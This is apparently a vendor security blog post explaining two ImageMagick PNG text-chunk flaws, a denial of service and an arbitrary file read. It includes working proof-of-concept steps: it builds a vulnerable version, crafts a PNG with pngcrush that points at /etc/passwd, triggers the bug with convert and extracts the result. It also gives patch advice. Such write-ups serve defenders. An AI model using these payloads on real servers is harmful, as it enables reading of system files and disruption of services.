DoS and Information Disclosure Vulnerability in ImageMagick

Published in

Keysight ATI

5 min readApr 4, 2023

ImageMagick is a free open-source software suite, used for editing and manipulating digital images. It is widely used in industries such as web development, graphic design, and video editing, as well as in scientific research, medical imaging, and astronomy.

Recently cybersecurity researchers have found two security flaws in the open source ImageMagick software [1] that leads to a denial-of-service (DoS) and information disclosure. These issues were identified by Latin American cybersecurity firm Metabase Q [2] in version 7.1.0–49, which were addressed in ImageMagick version 7.1.0–52, released in November 2022.

In this blog we will talk about these vulnerabilities in details. Both vulnerabilities originate from a logic flaw in the “text chunk” parser in the PNG file format. A text chunk is a chunk of metadata that can be used to store textual information related to the image. The text chunk has a keyword and a text string. If we provide keyword as “profile”, then ImageMagick will process the text string as a filename and will load the content as a raw profile.

Below diagram shows a text chunk in a PNG file.

CVE-2022–44267: Denial of Service

In the text chunk if we provide the text string as “-“ (dash), then ImageMagick will read the content from standard input and leave the process waiting forever. This leads to a Denial of Service condition which might lead to ImageMagick not being able to process other images [3].

CVE-2022–44268: Arbitrary File Read

When ImageMagick parses a PNG file, this vulnerability can lead to the resulting image embedding the content of an arbitrary file from the server (if the ImageMagick process has permissions to read it).

Instead of the dash in the previous vulnerability, if we give the text string as the path of a valid file on the system like “/etc/passwd” , it will then read the contents of the same file and will embed it into resultant PNG [4].

Attack in action

There are publicly available Proof of Concepts for these vulnerabilities, let’s try them out now.

Configuring the target

Install the vulnerable ImageMagick version on a linux system from the source [5]. (Make sure that ImageMagick version is prior to 7.1.0–52)
Clone the source repository:
Install delegate libraries for JPEG, PNG.
Next configure and compile ImageMagick
If ImageMagick configured and compiled without complaint, we are ready to install it on our system. Administrator privileges are required to install.
We then need to configure the dynamic linker run-time bindings.

All of the above steps can be done using the following commands:

git clone https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.0
apt install libjpeg-dev libpng-dev
cd ImageMagick-7.1.0
./configure && make
sudo make install
sudo ldconfig /usr/local/lib

Finally, we can verify if the ImageMagick installed properly with converting any image-

/usr/local/bin/convert logo: logo.gif

Preparing the Malicious payload

install pngcrush and other tools (pngcrush will be used to add a text chunk to the png file) using the following command:

  apt-get install pngcrush exiftool exiv2 -y

2. Now, we can add text chunk to any png image using pngcrush and make it malicious. Each text chunk contains a keyword and a text string. In keyword we provide “profile” and in text string we provide filename to read for e.g. — /etc/passwd.

Use the following command:

 pngcrush -text a “profile” “/etc/passwd” input.png poc.png

3. Similarly, if we want to create the payload for the Denial-of-Service attack, we can use “-“ as the text string and “profile” as a keyword in text chunk.

Executing the Payload

To trigger the vulnerability, we use the following command:

 convert poc.png output.png

The ‘convert’ command is provided by ImageMagick for manipulation of images. The poc.png contains a stored payload in a text chunk to read the contents of the file /etc/passwd. After executing the command, the contents of /etc/passwd file of the host machine will be embedded in output.png.

The file’s contents can be seen by running the following command:

 identify -verbose output.png

Upon converting the Hex bytes into ASCII, we get –

In Denial-of-Service attack, ImageMagick will try to read the content from standard input potentially leaving the process waiting forever.

Mitigation

To be able to mitigate this attack, make sure to apply the vendor-supplied patch [6]. You can also use Keysight test platforms with ATI subscription to be able to safeguard your network against such attacks. Keysight Threat Simulator or BreakingPoint products can help you assess your network security controls and determine whether you can be protected prior to patch. This kind of assessment is valuable as it can let you know if you have protection during the time before a change management window will open.

Leverage subscription service to stay ahead of attacks

Keysight’s Application and Threat Intelligence (ATI) Subscription provides daily malware and bi-weekly updates of the latest application protocols and vulnerabilities for use with Keysight test platforms. The ATI Research Center continuously monitors threats as they appear in the wild and has just released a strike for this CVE as part of BreakingPoint System’s recent update 2023–04. More information is present here [7].

The following image shows screenshots of the 2 CVEs as a strike in BreakingPoint System: